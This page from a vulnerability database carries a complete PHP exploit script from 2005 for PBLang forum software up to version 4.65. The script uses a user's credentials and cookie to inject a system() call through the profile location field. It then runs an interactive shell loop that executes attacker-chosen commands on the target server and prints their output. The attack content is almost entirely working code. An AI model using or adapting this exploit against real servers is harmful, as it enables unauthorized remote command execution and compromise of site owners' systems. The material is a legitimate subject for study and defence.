Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PBLang <= 4.65 - Remote Command Execution Exploit (2)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 19 Views

PBLang 4.65 Remote Exploi

Code

                                                &#60;?php
#
|    ##############################################    |
|    # PBLang &#60;= 4.65 remote commands exec exploit#    |
|    # tested on 4.65                             #    |
|    # (c)oded by Pengo 2005 RST/GHC              #    |
|    # http://rst.void.ru                         #    |
|    # http://ghc.ru                              #    |
|    ##############################################    |
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# WARNING! This exploit is successfully work when magic_quotes_rpc off =(
# D:\httpd\php&#62;php.exe ..\www\r57pblang465.php localhost /pbl/ &#34;pblcookie732128=Pe
# ng0; PBLsecid=a4c2f845c002ac54f5751440647f3c91;&#34; Peng0 PrSrS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ARGV = $_SERVER[&#39;argv&#39;];
global $ARGV;
if(count($ARGV) == 0)
{
 echo base64_decode(&#34;3fLu8iDx6vDo7/Ig5O7r5uXtIOH78vwg5+Dv8/nl7SDo5yDq7uzg7eTt7u
kg8fLw7uroLiDR7eD34OvgIO3z5u3uIOfg8OXj6PHy8Ojw7uLg8vzx/yDoDQroIOfg6+7j6O3o8vzx/
yDt4CD25evl4u7sIPTu8PPs5Swg5+Dy5ewg7fPm7e4g7+7x7O7y8PLl8vwg6vPq6DogcGJsY29va2llI
FBCTHNlY2lkLg0KxfHr6CDi6uv+9+Xt+yBtYWdpY19xdW90ZXNfcnBjIPHq8Ojv8iDt5SD08+3q9uju7
ejw8+XyLg==&#34;);
 exit;
}

if (count($ARGV) &#60; 5)
{
 echo &#39;############################################################
     PBLang &#60;=4.65 remote command execution exploit
        by RST/GHC // rst.void.ru / ghc.ru //
############################################################
 usage:
 r57pblang465.php [URL] [DIR] [COOKIE] [LOGIN] [PASS] [PROXI:PORT]
 params:
  [URL] - server url e.g. www.host.ru
  [DIR] - directory where PBLang installed e.g. /forum/ or /
  [COOKIE] - e.g. &#34;pblcookie732128=Peng0; PBLsecid=a4c2f845c002ac54f5751440647f3c91;&#34;
  [NAME] - your account name
  [PASS] - your account pass
  [PROXI:PORT] - e.g. &#34;130.208.18.30:3128&#34; (optional)
############################################################&#39;;
 exit;
}

$serv   = $ARGV[1];
$dir    = $ARGV[2];
$cookie = $ARGV[3];
$login  = $ARGV[4];
$pass   = $ARGV[5];

if(isset($ARGV[6]))
{
 $ARGV[6] = parse_url($ARGV[6]);
 $host = $ARGV[6][&#39;host&#39;];
 $port = $ARGV[6][&#39;port&#39;];
} else {
 $host = $serv;
 $port = &#39;80&#39;;
}

function create_socket($hostname,$portt,$post)
{
 $socket = @fsockopen($hostname, $portt, $errno, $errstr, 60)
            or die (&#34;\n[-] CONNECT FAILED\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n&#34;);
 $answer = &#39;&#39;;
 fwrite($socket,$post);
 while (!feof($socket))
 {
  $answer .= fgets($socket, 128);
 }
 fclose($socket);
 return $answer;
}

$a = 1;

print &#34;\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&#34;;
print &#34;\nexample &#39;close&#39;\n&#34;;
print &#34;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n&#34;;

$din = fopen(&#39;php://stdin&#39;,&#39;r&#39;);

while ($a !== 0)
{
 print &#34;shell&#62;&#34;; $cmd = fgets($din, 100);
 if(!stristr($cmd,&#39;close&#39;))
 {
  echo $cmd.&#34;\n&#34;;

  $query = &#34;user=&#34;;
  $query .= $login;
  $query .= &#34;&pass=&#34;;
  $query .= $pass;
  $query .= &#34;&pass2=&#34;;
  $query .= $pass;
  $query .= &#34;&oldpass=&#34;;
  $query .= $pass;
  $query .= &#34;&[email protected]&emhide=hide&#34;;
  $query .= &#34;&realname=&alias=&#34;.$login.&#34;&msn=&icq=&aim=&yahoo=&qq=&web=http%3A%2F%2F&#34;;
  $query .= &#34;&loc=%22%3B+system%28%22echo%20%5F%45%4E%54%45%52%5F%3B%20&#34;;
  $query .= $cmd;
  $query .= &#34;%3B%20%5F%51%55%49%54%5F%22%29%3B+echo+%22&#34;;
  $query .= &#34;&pt=rst.ghc%21&av=none&webav=&sig=&regcode=1125428486&lang=en&accept=1&Submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC&#34;;

  $post = &#34;POST http://&#34;.$serv.$dir.&#34;ucp.php?id=2&user=&#34;.$login.&#34; HTTP/1.0\r\nHost: &#34;.$serv.&#34;\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/4.0\r\nCookie: &#34;.$cookie.&#34;\r\nContent-Length: &#34;.strlen($query).&#34;\r\n\r\n$query&#34;;

  $answer = create_socket($host,$port,$post);
/*
  $fp = fopen(&#39;lol.htm&#39;,&#39;w&#39;);
  fwrite($fp,$answer);
  fclose($fp);
*/
  if (eregi(&#34;_ENTER_(.*)_QUIT_&#34; , $answer, $cut))
  {
   $a = 1;
   echo $cut[1];
   echo &#34;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n&#34;;
  } else {
    echo &#34;\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n&#34;;
    echo &#34;[-] EXPLOIT FAILD\r\n&#34;;
    echo &#34;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n&#34;;
   $a = 0;
  }
 } else {
  echo &#34;\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n&#34;;
  echo &#34;[-] EXPLOIT CLOSED\r\n&#34;;
  echo &#34;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n&#34;;
  $a = 0;
  fclose($din);
 }
}

?&#62;

# milw0rm.com [2005-09-07]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
pblangremote command executionexploitsecurity vulnerabilitypengo 2005rst/ghc
19